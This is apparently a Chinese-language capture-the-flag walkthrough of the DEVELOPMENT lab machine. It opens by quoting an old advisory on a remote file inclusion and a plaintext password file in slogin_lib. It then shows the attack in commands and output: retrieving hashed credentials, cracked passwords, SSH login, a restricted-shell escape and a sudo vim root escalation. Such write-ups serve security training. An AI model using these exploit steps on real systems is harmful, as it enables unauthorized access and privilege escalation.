[CODE] include_once ($slogin_path . "header.inc.php"); [/CODE]

FIX: Just declare $slogin_path. An example of a bugged inclusion in the source is this:

[CODE] include_once ($slogin_path . "header.inc.php"); [/CODE]

The header.inc.php file, such as all the files of this cms, is in the same dir of
slogin_lib.inc.php, so a fix could be just to include the file, without including
a variable, which should be null becouse all the files are in the same dir.

[CODE] include_once ("header.inc.php"); # <-- This is a secure include. [/CODE]


[!] EXPLOIT: /[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]

########################################################################################
[0x03] Bug:[Sensitive Data Disclosure]
######

* As I already said, this is not a real bug, becouse is the intention of the author
  to use a .txt file as a login storage. But it's weird, it's unsecure ! Maybe he just 
  sees the goodness of people (hehe xD)

In this login system, sensible datas like username and password are stored in a local
text file , so we can get sensitive information just going to this txt file . The name of
this file is set in slogin_lib.inc.php. By default is: slog_users.txt

[!] EXPLOIT: /[path]/slog_users.txt

#########################################################################################

[/END]

# milw0rm.com [2008-12-14]

发现/[path]/slogin_lib.inc.php,/[path]/slog_users.txt

访问:http://192.168.128.132:8080/developmentsecretpage/slog_users.txt

image-20220323161716181

admin, 3cb1d13bb83ffff2defe8d1443d3a0eb
intern, 4a8a2b374f463b7aedbb44a066363b81
patrick, 87e6d56ce79af90dbe07d387d3d0579e
qiu, ee64497098d0926d198f54f6d5431f98

MD5解密,结果如下:

admin, 解密失败
intern, 12345678900987654321
patrick, P@ssw0rd25
qiu, qiu

ssh尝试登录,发现只有intern可以登录

⬢  DEVELOPMENT  ssh intern@192.168.128.132                      
The authenticity of host '192.168.128.132 (192.168.128.132)' can't be established.
ED25519 key fingerprint is SHA256:gCZ6+ixH4Qe19wr8iDYUTaofDOf16k4ccCQ68NZ08yM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.128.132' (ED25519) to the list of known hosts.
intern@192.168.128.132's password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-34-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Mar 23 08:26:11 UTC 2022

  System load:  0.0                Processes:            166
  Usage of /:   28.3% of 19.56GB   Users logged in:      0
  Memory usage: 37%                IP address for ens33: 192.168.128.132
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

370 packages can be updated.
253 updates are security updates.


Last login: Thu Aug 23 15:57:48 2018 from 192.168.254.228
Congratulations! You tried harder!
Welcome to Development!
Type '?' or 'help' to get the list of allowed commands
intern:~$

切换一下交互式shell:echo os.system('/bin/bash')

intern:~$ echo os.system('/bin/bash')
intern@development:~$ id
uid=1002(intern) gid=1006(intern) groups=1006(intern)
intern@development:~$ pwd
/home/intern

2.4权限提升

2.4.1 信息收集

intern账户中信息收集一波,并没有什么发现,尝试切换至其他用户

intern@development:/home$ su patrick
Password: 
patrick@development:/home$ 
patrick@development:/home$ ls -al
total 20
drwxr-xr-x  5 root    root    4096 Jun 14  2018 .
drwxr-xr-x 23 root    root    4096 Mar 23 07:42 ..
drwxr-xr-x  5 admin   admin   4096 Dec 26  2018 admin
drwxr-xr-x  7 intern  intern  4096 Mar 23 08:54 intern
drwxr-xr-x  4 patrick patrick 4096 Sep 29  2018 patrick
patrick@development:/home$ sudo -l
Matching Defaults entries for patrick on development:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User patrick may run the following commands on development:
    (ALL) NOPASSWD: /usr/bin/vim
    (ALL) NOPASSWD: /bin/nano
patrick@development:/home$

可以看到用户patrick可以以root权限免密执行 vim与nano命令

https://gtfobins.github.io查询一下

image-20220323170041004

sudo /usr/bin/vim进入vim编辑页面

执行:shell:!/bin/bash即可转为root权限

patrick@development:/home$ sudo /usr/bin/vim 

[No write since last change]
root@development:/home# cd /root
root@development:/root# ls -al
total 72
drwx------  5 root  root    4096 Dec 26  2018 .
drwxr-xr-x 23 root  root    4096 Mar 23 07:42 ..
-rw-------  1 root  root    1622 Dec 26  2018 .bash_history
-rw-r--r--  1 root  root    3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root  root     644 Jun 14  2018 iptables-rules
drwxr-xr-x  3 root  root    4096 Jun 12  2018 .local
drwxr-xr-x  7 admin lpadmin 4096 Aug 23  2018 lshell-0.9.9
-rw-r--r--  1 root  root     148 Aug 17  2015 .profile
----------  1 root  root      43 Dec 26  2018 proof.txt
-rw-------  1 root  root    1024 Aug  1  2018 .rnd
-rw-r--r--  1 root  root      66 Sep 26  2018 .selected_editor
-rw-r--r--  1 root  root    9542 Jul 15  2018 smb.conf
drwx------  2 root  root    4096 Jun 10  2018 .ssh
-rwx------  1 root  root     229 Sep 26  2018 tcpdumpclock.sh
-rw-------  1 root  root     582 Aug 27  2018 .viminfo
-rw-r--r--  1 root  root     209 Aug  1  2018 .wget-hsts
root@development:/root# cat proof.txt
Congratulations on rooting DEVELOPMENT! :)
root@development:/root#

成功拿到flag

总结

本节通过信息收集,找到登陆页面,通过搜索slogin_lib.inc.php得知漏洞信息,再通过访问相关文件得到用户及密码,ssh登录后,最后通过vim提权

  1. 发现主机
  2. 端口扫描
  3. 远程文件包含漏洞
  4. sudo提权—vim提权
hirak0
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hirak0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值